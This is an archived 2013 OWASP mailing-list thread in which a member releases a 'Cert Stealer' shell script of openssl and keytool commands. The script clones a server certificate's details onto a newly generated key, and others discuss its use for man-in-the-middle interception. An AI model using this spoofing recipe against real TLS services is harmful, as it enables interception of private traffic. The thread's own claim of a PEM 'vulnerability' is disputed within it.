[Owasp-leaders] Cert Stealer Released

Tim tim.morgan at owasp.org
Thu Dec 26 19:49:40 UTC 2013


My best guess is that he's reading the certificate, generating a new
key pair and then associating the certificate properties with his new
public/private key.  This does have quite a bit of utility.
Certificate verification can partially fail in a variety of ways,
particularly when dealing with appliances.  For instance, sometimes people add
special non-standard properties to certificates for
application-specific authorization checks.  So the more certificate
properties you spoof accurately, the better chances are of success if
the verification is incomplete.

I have a private MitM tool I wrote that does the same thing all in
Python, albeit imperfectly.  It just generates new certificates on the
fly after ripping the public details off of the server side.  I showed
this code to the guys who build Mallory[1] a while back and they copied
the idea (but not the code) into their tool.  I imagine Burp probably
does something similar in some of it's certificate generation options,
though I haven't checked it if copies more than just the Subject.

tim

1. https://intrepidusgroup.com/insight/mallory/


On Thu, Dec 26, 2013 at 02:40:48PM -0500, Abbas Naderi wrote:
> Maybe the PEM you’re using is not a cert, but a private key. They are both encoded into PEM files. If you have the private key, then you don’t need to exploit it! You already have it.
> 
> And BTW whats the practical use of this, I mean have you used it anywhere? How can it be used to exploit something.
> -A
> On Dec 26, 2013, at 2:38 PM, Gregory Disney <gregory.disney at owasp.org> wrote:
> 
> > openssl s_client -showcerts -connect $host:$port > $keyring.pem; 
> > openssl x509 -in $keyring.pem  -pubkey > $keyring.cer;
> > keytool -keystore $ks --importcert --alias $keyring.pem -file $keyring.pem -storepass $passwd -noprompt;
> > keytool -genkey -alias $keyring.key -keyalg RSA -keystore $ks -storepass $passwd -noprompt
> > keytool -v -importkeystore -srckeystore $ks -srcalias $keyring.key -destkeystore $keyring.p12 -file $keyring.p12 -deststoretype PKCS12 -storepass $passwd -noprompt
> > openssl pkcs12 -in $keyring.p12 -out $keyring.key -passin pass:$passwd
> > echo "Stealing CA"
> > cat $keyring.key >> $keyring.pem
> > openssl x509 -inform pem -in $keyring.pem -out ca-$keyring.crt -signkey $keyring.key -CA $keyring.key -CAcreateserial 
> > 
> > This is how I exactly do it, they are checking for public key and private key, I'm not sure why openssl let's you resign as a key. But here is the source for the exploit. 
> > 
> > On 12/26/13, 11:35 AM, Abbas Naderi wrote:
> >> I didn’t quite understand. What does the encoding vulnerability expose? SSL certs are public-keys plus a bunch of other data. There is no private key inside to extract and resign another certificate with.
> >> -A
> >> On Dec 26, 2013, at 2:32 PM, Gregory Disney <gregory.disney at owasp.org> wrote:
> >> 
> >>> I think a fair description would be it simplifies spoofing certs. This started out as a proof of concept a year ago when I realized there was a vulnerability in PEM encoding of SSL certs, So I chain-loaded a java key store which was converted to key, then resigned the cert with the chain-loaded key, thus keeping the context of the original certificate with a hijacked authority. 
> >>> On 12/26/13, 11:21 AM, Abbas Naderi wrote:
> >>>> Well a description of what this does would be a good idea to start with…
> >>>> -A
> >>>> On Dec 26, 2013, at 2:18 PM, Gregory Disney <gregory.disney at owasp.org> wrote:
> >>>> 
> >>>>> I'm working on the documentation it works via  turning a a keytool pk12 to openssl key, then embedding the key on the root ca and resigning with the embedded key.
> >>>>> On 12/26/13, 10:47 AM, Dinis Cruz wrote:
> >>>>>> Hi Gregory, where can I find the details of how this works?
> >>>>>> 
> >>>>>> Thx
> >>>>>> 
> >>>>>> Dinis
> >>>>>> 
> >>>>>> On 26 Dec 2013 07:44, "Gregory Disney" <gregory.disney at owasp.org> wrote:
> >>>>>> Screen shot of successfully spoofed certs:
> >>>>>> http://image-store.slidesharecdn.com/f6ff3390-6dfc-11e3-8ed6-22000a9193db-original.png
> >>>>>> Each of these cert's have been tested and capable of creating SSL sessions.
> >>>>>> Cert Stealer:
> >>>>>> https://gist.github.com/gdisneyleugers/8129304
> >>>>>> -Greg
> >>>>>> _______________________________________________
> >>>>>> OWASP-Leaders mailing list
> >>>>>> OWASP-Leaders at lists.owasp.org
> >>>>>> https://lists.owasp.org/mailman/listinfo/owasp-leaders
> >>>>> 
> >>>>> _______________________________________________
> >>>>> OWASP-Leaders mailing list
> >>>>> OWASP-Leaders at lists.owasp.org
> >>>>> https://lists.owasp.org/mailman/listinfo/owasp-leaders
> >>>> 
> >>> 
> >> 
> > 
> 



> _______________________________________________
> OWASP-Leaders mailing list
> OWASP-Leaders at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-leaders



More information about the OWASP-Leaders mailing list